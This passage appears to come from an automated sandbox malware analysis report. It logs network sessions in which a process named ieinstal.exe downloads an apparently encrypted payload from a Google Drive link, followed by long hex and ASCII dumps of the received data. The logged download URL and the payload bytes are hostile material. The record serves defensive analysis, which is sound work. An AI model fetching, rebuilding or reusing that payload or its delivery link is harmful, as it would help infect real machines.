41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 Data Ascii: ABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABb
2023-03-02 16:18:25 UTC	242	IN	Data Raw: 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 Data Ascii: FsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsA
2023-03-02 16:18:25 UTC	244	IN	Data Raw: 44 52 63 63 30 61 61 71 45 4c 41 77 74 75 6c 6a 33 62 32 67 30 61 71 52 52 47 56 4e 64 6d 64 78 32 62 65 4e 54 71 57 70 53 31 48 56 55 52 6d 73 70 6e 6a 62 6d 50 42 63 2b 63 32 51 64 69 54 55 67 39 6a 76 45 4b 79 32 35 65 73 6e 67 72 72 51 71 76 62 6a 34 75 34 56 31 64 44 73 42 74 66 48 6d 62 58 52 54 71 57 70 65 62 37 5a 31 6f 53 4e 75 44 6e 56 73 56 70 57 6c 34 55 34 49 55 78 54 4e 52 71 5a 4d 64 70 30 2f 50 32 61 31 70 6d 54 71 4e 6a 76 70 58 69 7a 31 66 46 61 56 70 65 4f 77 2f 66 74 6b 37 55 2b 32 66 48 61 61 32 6e 35 45 58 32 38 45 36 65 44 65 31 36 79 46 74 6d 78 2b 32 62 37 31 4c 30 57 32 62 48 34 4b 6a 6a 42 7a 76 52 38 31 70 6f 57 6d 62 47 5a 58 36 4f 73 5a 43 6c 6d 55 37 63 6f 6d 62 48 61 64 36 62 2f 35 37 54 70 45 37 55 44 32 54 48 61 51 56 65 Data Ascii: DRcc0aaqELAwtulj3b2g0aqRRGVNdmdx2beNTqWpS1HVURmspnjbmPBc+c2QdiTUg9jvEKy25esngrrQqvbj4u4V1dDsBtfHmbXRTqWpeb7Z1oSNuDnVsVpWl4U4IUxTNRqZMdp0/P2a1pmTqNjvpXiz1fFaVpeOw/ftk7U+2fHaa2n5EX28E6eDe16yFtmx+2b71L0W2bH4KjjBzvR81poWmbGZX6OsZClmU7combHad6b/57TpE7UD2THaQVe
2023-03-02 16:18:25 UTC	245	IN	Data Raw: 5a 2b 42 44 32 62 48 61 61 57 32 2f 34 37 52 36 35 64 6f 57 6d 62 52 66 72 46 30 58 36 49 73 45 2f 46 65 35 6f 44 69 78 6b 72 50 35 78 48 70 48 36 6f 6d 30 66 4f 54 61 46 70 6d 54 44 51 65 35 53 31 74 61 32 7a 2b 73 79 2b 52 4d 4b 2f 6a 59 46 69 35 33 71 31 44 75 6d 4b 4a 54 4e 52 32 5a 38 64 70 70 59 64 47 68 56 70 6e 78 32 6e 62 69 38 64 6f 57 6d 61 6d 6c 72 6f 41 51 71 72 51 66 6b 2f 30 42 57 54 48 61 61 4c 56 65 65 6d 70 70 45 65 61 33 75 59 45 76 54 7a 50 73 70 5a 69 2b 35 68 72 57 6d 5a 4e 39 41 56 6b 78 32 6b 75 72 76 36 36 50 4f 33 66 55 49 6f 41 54 74 77 4e 5a 4d 64 70 50 46 38 4d 44 2b 51 31 77 41 2f 62 6b 48 59 34 50 4f 63 78 52 57 55 41 52 71 2b 6c 2f 36 46 51 71 51 42 4d 33 41 31 6b 78 32 6b 75 2f 71 48 69 51 67 41 41 37 44 68 6b 78 32 6d 42 Data Ascii: Z+BD2bHaaW2/47R65doWmbRfrF0X6IsE/Fe5oDixkrP5xHpH6om0fOTaFpmTDQe5S1ta2z+sy+RMK/jYFi53q1DumKJTNR2Z8dppYdGhVpnx2nbi8doWmamlroAQqrQfk/0BWTHaaLVeemppEea3uYEvTzPspZi+5hrWmZN9AVkx2kurv66PO3fUIoATtwNZMdpPF8MD+Q1wA/bkHY4POcxRWUARq+l/6FQqQBM3A1kx2ku/qHiQgAA7Dhkx2mB
2023-03-02 16:18:25 UTC	246	IN	Data Raw: 48 56 66 71 31 76 74 4c 4f 79 68 4d 6b 67 38 41 5a 6b 6b 51 64 63 37 39 78 33 39 4e 4a 5a 37 53 66 34 46 61 4e 47 4e 51 70 49 4f 36 5a 4b 42 76 70 6b 34 6c 67 48 76 57 6c 42 59 5a 73 66 53 4d 39 77 69 6f 44 79 52 41 55 6b 38 41 45 4b 71 32 35 57 30 50 38 4a 59 52 70 6f 39 39 76 42 67 50 46 38 65 36 4a 6e 6e 52 4e 78 62 58 67 5a 52 70 7a 57 68 37 49 76 74 57 6c 42 59 5a 73 64 52 6d 5a 6c 53 72 56 70 6d 78 38 41 64 63 58 34 69 59 6f 42 44 68 54 7a 6a 42 46 47 31 57 71 33 73 69 51 61 68 30 75 73 4f 6f 65 69 68 31 36 39 6d 33 7a 45 45 6c 71 55 48 51 34 33 61 6d 33 34 50 33 37 61 68 55 4a 49 41 2f 71 48 69 71 35 44 4d 7a 64 37 48 61 56 70 6d 42 41 2b 74 70 33 78 74 50 46 38 57 44 32 4f 6b 2f 71 68 6a 72 6b 4f 6f 73 6b 33 33 6c 4b 58 74 67 30 31 65 34 67 53 52 Data Ascii: HVfq1vtLOyhMkg8AZkkQdc79x39NJZ7Sf4FaNGNQpIO6ZKBvpk4lgHvWlBYZsfSM9wioDyRAUk8AEKq25W0P8JYRpo99vBgPF8e6JnnRNxbXgZRpzWh7IvtWlBYZsdRmZlSrVpmx8AdcX4iYoBDhTzjBFG1Wq3siQah0usOoeih169m3zEElqUHQ43am34P37ahUJIA/qHiq5DMzd7HaVpmBA+tp3xtPF8WD2Ok/qhjrkOosk33lKXtg01e4gSR
2023-03-02 16:18:25 UTC	247	IN	Data Raw: 49 4b 6b 77 32 6d 79 49 65 43 58 70 51 42 2f 61 56 72 74 69 6a 6b 38 37 30 4c 6c 57 32 62 48 55 62 59 41 66 34 61 64 41 44 43 75 56 35 62 36 58 78 72 78 58 77 39 33 53 31 4d 50 32 35 7a 79 6f 6a 78 54 62 36 7a 65 69 50 2b 69 50 47 4e 42 4e 6a 78 66 51 75 56 62 5a 73 63 50 30 65 4e 4c 61 46 70 6d 75 6b 6f 79 54 34 44 74 73 2b 66 44 54 55 4f 75 74 59 48 62 55 75 50 38 48 2f 74 6c 36 46 35 43 37 71 7a 50 36 6b 4f 7a 70 59 65 68 37 49 68 65 4f 65 79 5a 58 68 59 38 33 71 56 4f 6a 4b 57 48 4c 36 46 66 6d 44 6a 52 75 67 7a 36 42 56 2f 6e 5a 33 4b 4b 58 67 78 63 4e 67 36 2b 42 6a 79 52 42 4e 50 33 58 77 31 73 71 66 6f 59 78 54 7a 6e 4f 62 56 35 41 45 61 51 34 66 6c 38 6f 46 76 2b 32 75 32 38 35 79 79 77 49 48 37 6f 36 4b 6c 64 33 46 44 56 35 77 52 63 4f 4e 39 5a Data Ascii: IKkw2myIeCXpQB/aVrtijk870LlW2bHUbYAf4adADCuV5b6XxrxXw93S1MP25zyojxTb6zeiP+iPGNBNjxfQuVbZscP0eNLaFpmukoyT4Dts+fDTUOutYHbUuP8H/tl6F5C7qzP6kOzpYeh7IheOeyZXhY83qVOjKWHL6FfmDjRugz6BV/nZ3KKXgxcNg6+BjyRBNP3Xw1sqfoYxTznObV5AEaQ4fl8oFv+2u285yywIH7o6Kld3FDV5wRcON9Z
2023-03-02 16:18:25 UTC	248	IN	Data Raw: 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 4e 36 73 6f 56 53 70 52 36 44 2b 4c 39 30 30 76 50 57 72 6e 50 49 4e 4f 54 64 45 6b 4c 57 52 31 37 4d 6e 38 6a 37 62 6d 43 34 6f 62 7a 48 49 37 4f 38 6a 4f 70 59 45 6a 6d 66 51 70 5a 6b 3d Data Ascii: FsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAN6soVSpR6D+L900vPWrnPINOTdEkLWR17Mn8j7bmC4obzHI7O8jOpYEjmfQpZk=

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.6	49727	142.250.203.110	443	C:\Program Files (x86)\Internet Explorer\ieinstal.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-02 16:19:41 UTC	249	OUT	GET /uc?export=download&id=1rIzD7daHU1mUfnDyXK-I-Gb1F3sb7xu2 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: drive.google.com Cache-Control: no-cache
2023-03-02 16:19:41 UTC	249	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Thu, 02 Mar 2023 16:19:41 GMT Location: https://doc-14-7s-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/96aecif6qgtmd866k395ve9ln4v2582p/1677773925000/00214763071378112578//1rIzD7daHU1mUfnDyXK-I-Gb1F3sb7xu2?e=download&uuid=1de4a321-c39e-4208-95ca-f1884cd889bf Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: script-src 'nonce-1O0r3BJ8zKU9UcX1_neECQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.6	49728	172.217.168.65	443	C:\Program Files (x86)\Internet Explorer\ieinstal.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-02 16:19:41 UTC	250	OUT	GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/96aecif6qgtmd866k395ve9ln4v2582p/1677773925000/00214763071378112578/*/1rIzD7daHU1mUfnDyXK-I-Gb1F3sb7xu2?e=download&uuid=1de4a321-c39e-4208-95ca-f1884cd889bf HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Cache-Control: no-cache Host: doc-14-7s-docs.googleusercontent.com Connection: Keep-Alive
2023-03-02 16:19:42 UTC	250	IN	HTTP/1.1 200 OK X-GUploader-UploadID: ADPycdtKzPqbFPwtagoAokj1fxq0FONE9k6bu2ZYkCBR3er3Wq9I-Q_SQh4L6INLC_gkCP5Wl4lmobgRUHJp1Duq8MmmPejeniD5 Content-Type: application/octet-stream Content-Disposition: attachment; filename="AkScKcjMWGSJvGXEzmPiG26.xsn"; filename=UTF-8''AkScKcjMWGSJvGXEzmPiG26.xsn Access-Control-Allow-Origin: Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-user-App-ID-Token, X-Earth-user-Computation-Profile, X-Earth-user-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token Access-Control-Allow-Methods: GET,HEAD,OPTIONS Content-Length: 190016 Date: Thu, 02 Mar 2023 16:19:42 GMT Expires: Thu, 02 Mar 2023 16:19:42 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=hx9XNA== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2023-03-02 16:19:42 UTC	254	IN	Data Raw: ef c7 1b 4f d0 fb e1 8e da de cd 01 5b 33 da e0 18 7e 2b 25 9c f0 c2 0b 8e 1e de 62 bb 14 78 69 c8 96 d2 ce 2a a5 84 d9 bb cd fb 16 85 48 30 25 ad f9 5b 7a 72 7c 0c de 8e e2 2b 62 d7 b0 75 b8 7b e4 f2 a4 b2 c2 da 2f 06 a1 8a 38 02 55 be b2 10 d2 9e 59 d7 be 69 64 38 ef db 29 9f 2c 5a ba 84 80 c4 74 13 d2 8f 5a d5 c5 eb 58 19 09 79 64 6b 80 45 26 9f 6c e7 47 09 f9 b3 43 05 25 a7 30 f9 7a 0d f7 54 7e eb 13 4a 68 0f 92 54 f0 d3 ae 5b 7a f6 0c ec 82 cb 75 0f f7 91 1d 6b db b4 4d 6a de 87 97 9e d6 9e 94 df ee 13 d6 ee 3b 7e 62 0a e0 c4 a8 fd af ce 32 4b bf 85 39 c9 5e c1 8c b9 6b c8 98 e5 67 2e 1c b2 5c 98 d9 a6 34 62 df c5 e2 75 b8 f4 e8 93 8a 19 24 36 cb fe e1 31 f2 1a aa 4b 1d 21 b0 08 cc 50 b5 9e 4d 80 8a 4d 0d bb 11 12 c0 50 de 48 c9 63 07 2f b6 eb 07 ef Data Ascii: O[3~+%bxi*H0%[zr\|+bu{/8UYid8),ZtZXydkE&lGC%0zT~JhT[zukMj;~b2K9^kg.\4bu$61K!PMMPHc/
2023-03-02 16:19:42 UTC	258	IN	Data Raw: 5b 10 8b 35 90 0e 54 f5 ab 46 2f 4c 6d 62 e8 dc 8d f4 0d ed 64 8a c6 0b 60 df f1 05 59 cd 2a 13 11 84 34 e9 46 84 42 94 c5 6c 83 23 15 f4 f7 c7 7d d7 21 67 39 2a 37 61 98 2c 35 eb bf c9 75 a5 fe 16 36 83 36 38 27 f3 d6 6c 85 74 41 88 07 36 be b7 f6 5a c2 da 2f 06 f9 09 d0 0b de 76 31 d0 ee 15 59 d4 7f ea a4 10 ec d3 d6 7e bc 5a ba 84 80 c4 74 13 d2 8f 5a d5 c5 eb 58 19 09 79 64 6b 80 45 26 9f 6c e7 47 09 f9 b3 43 c5 25 a7 30 f7 65 b7 f9 54 ca e2 de 6b d0 0e de 99 d1 87 c6 32 09 d6 7c 9e ed ac 07 6e 9a b1 7e 0a b5 da 22 1e fe e5 f2 be f1 60 16 74 ca 75 c5 6a 4c 2c 36 6c 02 c4 e9 d3 e2 43 04 67 bf f0 c0 89 0e 3e f9 04 26 4c 57 10 1a 2c 0d 83 2d c7 88 d0 6f a3 c3 a9 71 54 e6 14 c0 1a f4 98 c9 ae 6a f5 a5 4e 70 be 5e 0e da dd 46 7f 52 29 2e 77 27 49 b6 3d aa Data Ascii: [5TF/Lmbd`Y4FBl#}!g97a,5u668'ltA6Z/v1Y~ZtZXydkE&lGC%0eTk2\|n~"`tujL,6lCg>&LW,-oqTjNp^FR).w'I=
2023-03-02 16:19:42 UTC	262	IN	Data Raw: 94 bc 91 a3 49 ef 96 2a d4 a9 ad a5 9e 29 d1 da 4c 4c ef bf 84 94 c2 90 c2 55 e2 f2 14 6b 9d c4 39 8f 5f ca 19 d7 c4 5e ea a8 bf b2 22 df 39 76 ba b9 62 8c f3 8f 9b fc db c1 cf bd 73 d3 13 90 81 65 7f dd b6 4a c3 91 5e dd 3c 10 6f f1 a8 30 6f c8 64 b9 f8 14 1f 78 19 0e 06 4a 43 78 60 60 e9 f9 a2 e6 35 b8 a3 fd cf 59 10 10 08 18 d9 41 fa 03 6c a6 8b 8d e5 65 e0 08 cd 1c 79 cd b8 82 b0 87 3d 99 c4 1f ce 9b 12 74 0d ff 57 36 fa c7 8b 0a 2e 82 1a 56 a8 34 d7 0a 8d 6b a4 a3 8b ff 2d 1d f2 da 1a df 16 58 29 a8 d6 cd 4d 5c 91 4d 17 b0 22 91 5a d6 03 ab 7c 56 19 98 5e 56 43 11 b0 02 88 91 03 d2 2f ee 63 1f 01 a4 0f cb 93 43 77 1a 5d c4 ab d4 52 06 b9 b5 80 58 23 0f 68 f1 9e 14 9c dd fd 50 9b c3 f7 d8 be 11 5c f5 56 59 16 8b 25 5a ae f1 9d 3c 42 ec b6 50 54 e2 47 Data Ascii: I*)LLUk9_^"9vbseJ^<o0odxJCx``5YAley=tW6.V4k-X)M\M"Z\|V^VC/cCw]RX#hP\VY%Z<BPTG
2023-03-02 16:19:42 UTC	266	IN	Data Raw: ef ff 51 2e 52 85 d6 8d 65 3a e9 40 10 05 f7 8a b1 e0 d1 49 9b 5d 10 2c 11 f7 ee 2f 8b b8 4a 1b 9d 17 1c d2 36 b2 d0 7e 00 a6 bd b1 f2 4e e0 a9 23 28 11 9f 31 3f 8e e8 1b eb 22 3b bc 76 98 e5 18 1c 4c e2 1c 67 8d 27 97 80 7c 3f 4c 90 4c cb 42 f5 c0 ec 5c 09 92 bd 91 21 3e 7c ea ea 8b 50 9c b5 e9 b6 57 00 f1 2f 9e 0e e4 ae db 54 d2 68 ce 25 b7 99 33 03 e0 14 56 49 e5 ae 35 a8 ae db 7f d4 36 fd f4 3e 3e f0 e9 03 df a2 7d 44 d4 77 73 b9 83 87 4a 94 40 f4 ea f7 b2 e8 49 bd c9 c1 3a 0b 0f 7b 29 ed b3 6e b6 a1 6c e4 72 61 95 4b 7a 83 56 88 a6 8d e3 94 19 ac fc fa f6 d3 bb de bf 80 d1 ee 37 d1 71 88 15 bd e0 e8 1a 33 85 c5 bf e4 a9 08 ee be d4 7a cd 42 a3 d2 50 a9 a1 3d d1 1e 83 24 d3 43 c6 6f 4a 6a d1 56 12 b3 68 6c 3e 57 ee 81 7a 59 8c 3a 18 ff ca 9d 08 ec 84 Data Ascii: Q.Re:@I],/J6~N#(1?";vLg'\|?LLB\!>\|PW/Th%3VI56>>}DwsJ@I:{)nlraKzV7q3zBP=$CoJjVhl>WzY:
2023-03-02 16:19:42 UTC	266	IN	Data Raw: 50 77 cd 79 b3 d7 b5 c9 e7 3d 45 b6 15 7d a9 1b 3e e3 7c ec 60 b9 46 8d ec 3c fa 21 5a a2 a6 aa 04 a7 f9 a8 3e f3 04 3c 6c 41 a0 54 94 10 9a e8 52 62 90 d7 60 a7 83 ef 41 b7 a4 29 b5 ce cc 47 19 5f b5 a1 26 68 81 0a 4f 8d 1c 63 bc 04 d2 4a 40 52 6b c1 83 40 e5 a0 90 e5 c7 59 e3 16 91 f1 cf 9f ff 95 3c 1b b3 d1 99 4d 65 1e d8 dd 3b 54 29 77 3a 4c 5d 68 d3 4c ac 3f 04 d6 19 c6 79 30 31 1e ee 40 a9 97 46 08 31 78 b4 05 4e cd 93 d6 f0 bb 2b c0 46 d5 e7 6a d4 52 03 8a 70 21 d7 09 8c c4 f8 e2 f0 16 be 4c ca 00 df 14 89 12 34 2e 2d c8 9e 6a e4 d3 27 27 10 27 ba ac a7 6e 9c b5 e6 68 fb 90 11 a9 08 13 4c d2 6d 38 07 22 8b dd df bc 8d 82 f0 9c 0c 9c 44 bd 05 20 07 f2 21 30 e4 3c a6 8b 2e 5c eb 85 34 ad 37 86 cc 23 71 14 fe ff 65 f2 41 e3 da 21 31 93 eb 8d e9 01 d4 Data Ascii: Pwy=E}>\|`F<!Z><lATRb`A)G_&hOcJ@Rk@Y<Me;T)w:L]hL?y01@F1xN+FjRp!L4.-j'''nhLm8"D !0<.\47#qeA!1
2023-03-02 16:19:42 UTC	268	IN	Data Raw: ff 26 1f ee da 9d c0 e0 62 c1 63 e8 de 02 58 9c 0c e8 c9 72 75 29 01 1f 2c e2 0f f8 b6 1c 19 85 bb fd ce fd d1 7c 7a ff c0 9a ed 59 15 8c d8 e6 c7 51 f2 16 8f 9e cc 88 8e 5e 31 11 c2 24 f4 14 ba be 74 80 f3 33 89 30 15 70 f3 88 fb fd 05 a2 a6 f3 2c d6 0b 6a 9c a4 69 32 b8 d8 55 4d c4 f7 6c ab cc 8a d0 e8 d9 a0 00 8f 13 83 f1 a1 be aa 31 b7 18 d7 74 ec e6 b0 d7 85 a3 9d 9e 7d 51 9d c1 73 2d b8 7d 28 c2 d8 d7 26 8b ac b3 09 7c ee 38 92 34 15 e0 a7 72 4f e3 e2 35 e7 64 4a 52 fb 64 aa d2 cf b6 cc 9e c9 46 3c 38 97 b3 3a bc 7f 2a c5 47 97 e6 3b 68 9b bf 80 62 8f ed 55 57 9b 1f 45 f4 27 72 0f 89 87 8f 00 32 0c 11 a9 f2 ad 32 7a d9 fb f1 f1 cd 73 dc 91 24 52 c2 ca 48 5e 88 bc ef bf ea c4 67 ae bb 88 01 65 de fd 0f 5f 33 b2 27 0c e7 f6 75 e6 b1 43 e1 3d a3 0b 56 Data Ascii: &bcXru),\|zYQ^1$t30p,ji2UMl1t}Qs-}(&\|84rO5dJRdF<8:*G;hbUWE'r22zs$RH^ge_3'uC=V
2023-03-02 16:19:42 UTC	269	IN	Data Raw: 51 52 ea 8d 42 cf 25 6b 45 cb a8 e4 8f 82 5d 04 72 5b cd 95 5e b6 a7 f6 d8 29 84 18 ea e6 a7 6f 93 5f cb a1 8a 11 15 66 72 ad 24 50 90 ec 0f 23 64 b5 1b b3 75 dc 9a ce b4 0e ec a6 3d 03 c1 73 b8 af df db aa eb 45 2b da 8d 1b f6 db 76 31 e4 a6 57 12 7a 1e 9c ed a9 b5 ce 3e ee ca e9 08 52 8f 8d 6c 2f dd 50 80 45 fb 19 04 f2 f3 19 40 12 4f c2 6a 38 e5 98 aa 24 92 76 dd 10 7b 0f 33 8f ed 3e 11 0b cd 52 8c b0 1a 61 d4 04 c2 47 2c db e6 66 db e5 58 53 c3 ff 1d d6 80 3a 1c 6f ad 58 9c c1 13 2d 6e 62 f0 18 cc ac 44 9e ef 02 b7 21 51 49 dc b1 d2 c7 be ee 87 d1 79 2c 61 37 7c 0e d0 3e 22 55 3e 0b 69 51 17 78 e5 5b 2b 65 3e 69 ac fc 3c c0 dc 6d 67 b7 39 b5 7f 5c fc 6a 04 1d ea df 55 19 c7 68 e3 f6 34 36 72 50 29 ef 4e e1 df 0d da 0e cc a3 60 74 79 25 6a eb da b4 d2 Data Ascii: QRB%kE]r[^)o_fr$P#du=sE+v1Wz>Rl/PE@Oj8$v{3>RaG,fXS:oX-nbD!QIy,a7\|>"U>iQx[+e>i<mg9\jUh46rP)N`ty%j
2023-03-02 16:19:42 UTC	270	IN	Data Raw: 4a 3a 94 bd 32 82 ba 99 21 9d 90 c4 04 c3 f3 9a 01 64 bb f7 78 c8 06 c6 d2 a3 04 d2 b3 7b 41 c7 6a 4f 38 61 71 47 e8 0d 50 f0 4b e7 6d 00 c1 6b 8c 23 3b 30 82 41 29 d4 d4 d6 e2 bd bf 6a ee 54 5d 3c 88 16 6c 15 82 f1 2d aa 5f 97 03 a3 ed 7b 1a b1 24 81 cf bb b2 be fe 77 ab f2 cb 80 02 b0 76 30 f5 87 d7 7c 80 fd 16 ff f7 5f bc db 97 35 76 7b 49 1a 1b e8 a8 6f a3 c1 02 e0 3b 7a 56 9a f5 b6 d8 75 de 23 ff 36 75 f3 e9 e5 86 79 5a e3 42 34 e5 96 1d ba 13 47 21 70 87 9e 3f 7f b6 06 e3 5d 15 0e ba 93 da f6 f2 d5 5a 87 65 69 f0 13 89 07 97 f0 7b 24 85 d2 24 ed 33 38 fe f1 9d dd f1 fc 44 0d e8 26 27 91 08 31 9c a7 7a 0c 58 ba 4e 9f 6d ec b1 5e 10 b4 aa 1f ef 71 6f 35 79 1b 22 b2 8d 28 21 cf 77 9e 79 5a cf 54 89 10 d5 60 69 d5 8e 37 db 28 63 31 4b fc ef 3c e5 6f ee Data Ascii: J:2!dx{AjO8aqGPKmk#;0A)jT]<l-_{$wv0\|_5v{Io;zVu#6uyZB4G!p?]Zei{$$38D&'1zXNm^qo5y"(!wyZT`i7(c1K<o
2023-03-02 16:19:42 UTC	271	IN	Data Raw: 06 9c 62 22 56 4b d7 16 25 de 29 b2 96 5a 0e bb c3 15 5e 8b c9 e2 63 9c 3a c6 59 fb 87 be 02 5b 48 60 e7 44 76 c9 db c1 3a 10 8b 5d 63 ba f0 11 bf f8 61 08 66 72 0d fc 30 18 80 00 e6 03 58 7e 33 41 ef d1 de ae e0 8c 1c b7 f4 8f a9 c5 a9 12 a6 21 25 5f 2a d6 7c 0a 55 a7 85 74 d7 a7 a7 39 0d b4 93 7e 28 26 1c 1e ad b3 9e 3b e1 3a f1 8f 87 51 a5 fc 2d b1 b7 f7 c8 2c f2 ae d2 8f 5e 79 43 8c 18 d5 4c e9 22 47 be 74 c1 47 68 65 3c ae a3 19 65 79 46 b7 93 1b 1f 73 09 63 04 b5 9f 04 42 88 5d 86 9e 31 b6 c2 c3 14 cb e7 16 94 ee 9b 31 fb a3 82 26 1e 68 dd 6a b1 40 9b a9 3a 42 f9 95 31 30 bc 57 7d 36 eb bd 17 d9 6b e4 08 48 54 35 42 dd c3 43 74 92 e4 90 b7 e5 e0 